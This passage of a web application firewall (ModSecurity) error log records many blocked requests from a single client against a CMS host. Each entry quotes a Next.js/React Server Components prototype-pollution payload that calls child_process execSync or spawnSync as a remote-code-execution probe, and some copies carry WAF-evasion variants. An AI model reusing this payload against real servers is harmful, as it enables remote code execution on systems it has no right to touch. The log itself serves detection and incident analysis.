{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmxJc83uMXRUE9zvQShwAAAdY"] [Sun Apr 05 15:42:28.965099 2026] [:error] [pid 1503:tid 1528] [client 172.94.9.253:40936] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmxEI7AjfUQYCN-J7DXQAAANM"] [Sun Apr 05 15:42:28.970482 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:40978] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmxLxQSOrq_iRTM7dpAAAAAQo"] [Sun Apr 05 15:42:28.970574 2026] [:error] [pid 23077:tid 23099] [client 172.94.9.253:40976] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxJc83uMXRUE9zvQSiAAAAdA"] [Sun Apr 05 15:42:29.032324 2026] [:error] [pid 13019:tid 13240] [client 172.94.9.253:41090] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmxbxQSOrq_iRTM7dpAQAAAQA"] [Sun Apr 05 15:42:29.052755 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:41038] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmxbxQSOrq_iRTM7dpAwAAARA"] [Sun Apr 05 15:42:29.052808 2026] [:error] [pid 1503:tid 1512] [client 172.94.9.253:41026] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxUI7AjfUQYCN-J7DXgAAAMM"] [Sun Apr 05 15:42:29.052825 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:41112] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxbxQSOrq_iRTM7dpAgAAARI"] [Sun Apr 05 15:42:29.053251 2026] [:error] [pid 22788:tid 22797] [client 172.94.9.253:41080] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxSLbhFL16Wsx-C9C9gAAAYc"] [Sun Apr 05 15:42:29.053271 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:41064] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxZc83uMXRUE9zvQSiQAAAc8"] [Sun Apr 05 15:42:29.053794 2026] [:error] [pid 13019:tid 13260] [client 172.94.9.253:41116] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxbxQSOrq_iRTM7dpBAAAARQ"] [Sun Apr 05 15:42:29.053911 2026] [:error] [pid 1503:tid 1520] [client 172.94.9.253:41104] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxUI7AjfUQYCN-J7DXwAAAMs"] [Sun Apr 05 15:42:29.053962 2026] [:error] [pid 13019:tid 13257] [client 172.94.9.253:41066] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxbxQSOrq_iRTM7dpBQAAARE"] [Sun Apr 05 15:42:29.054717 2026] [:error] [pid 31198:tid 31270] [client 172.94.9.253:41050] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxTT5TgrBR8xRnfXA0AAAAVI"] [Sun Apr 05 15:42:29.172373 2026] [:error] [pid 13019:tid 13255] [client 172.94.9.253:41198] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxbxQSOrq_iRTM7dpBwAAAQ8"] [Sun Apr 05 15:42:29.172684 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:41142] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxbxQSOrq_iRTM7dpCAAAAQs"] [Sun Apr 05 15:42:29.172853 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:41184] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxZc83uMXRUE9zvQSiwAAAcY"] [Sun Apr 05 15:42:29.173107 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:41124] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmxbxQSOrq_iRTM7dpCQAAAQc"] [Sun Apr 05 15:42:29.173124 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:41156] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxZc83uMXRUE9zvQSjAAAAcg"] [Sun Apr 05 15:42:29.173596 2026] [:error] [pid 31198:tid 31259] [client 172.94.9.253:41126] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmxTT5TgrBR8xRnfXA0QAAAUc"] [Sun Apr 05 15:42:29.174094 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:41160] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new 